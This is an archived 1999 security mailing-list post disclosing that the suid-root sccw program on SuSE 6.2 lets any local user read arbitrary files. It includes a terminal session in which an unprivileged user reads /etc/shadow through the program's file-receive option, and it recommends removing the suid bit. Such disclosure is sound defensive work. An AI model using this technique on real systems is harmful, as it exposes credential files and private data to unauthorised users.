SuSE 6.2 /usr/bin/sccw read any file

Brock Tellier (btellierWEBLEY.COM)
Thu, 16 Sep 1999 19:28:02 -0500

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
• Next message: morex: "Fw: CERT Advisory CA-99.12 - Buffer Overflow in amd"
• Previous message: Brock Tellier: "Two SuSE 6.2 local root exploits"

Greetings,

    /usr/bin/sccw, suid root by default on SuSE 6.2, allows any user to
read any file on the system. Sort of. Well, it's enough to read the
text of almost anything. In capitals. Without punctuation. Check it
out:

xnecsusebox:/tmp > id
uid=1001(xnec) gid=100(users) groups=100(users)
xnecsusebox:/tmp > sccw
==========================================================
Soundcard CW for Linux v1.1 Steven J. Merrifield, VK3ESM
==========================================================
1. Set the speed, currently = 10
2. Set the frequency, currently = 700
3. Set the volume, currently = 32
4. Set the delay value, currently = 3
5. Set the character set for random groups, currently = 1
6. Set the number of groups, currently = 5
7. Receive random character groups.
8. Receive a file.
9. QUIT
==========================================================
Enter your choice : 8
Enter filename : /etc/shadow
ROOTFGPZNZWZ5GWRG10850010000
BIN8902010000
DAEMON8902010000
... etc.
The printing of these lines takes a few seconds each, so be patient.
While you're waiting, remove the suid-bit.
Of course, getting the /etc/shadow file in all caps isn't instant root,
but it's a start for someone out there. Besides, he can still read your
mail in all caps, without punctuation.

Brock Tellier
UNIX Systems Administrator
Webley Systems
www.webley.com

• Next message: morex: "Fw: CERT Advisory CA-99.12 - Buffer Overflow in amd"
• Previous message: Brock Tellier: "Two SuSE 6.2 local root exploits"

This archive was generated by hypermail 2.0b3 on Fri Sep 17 1999 - 04:09:32 CDT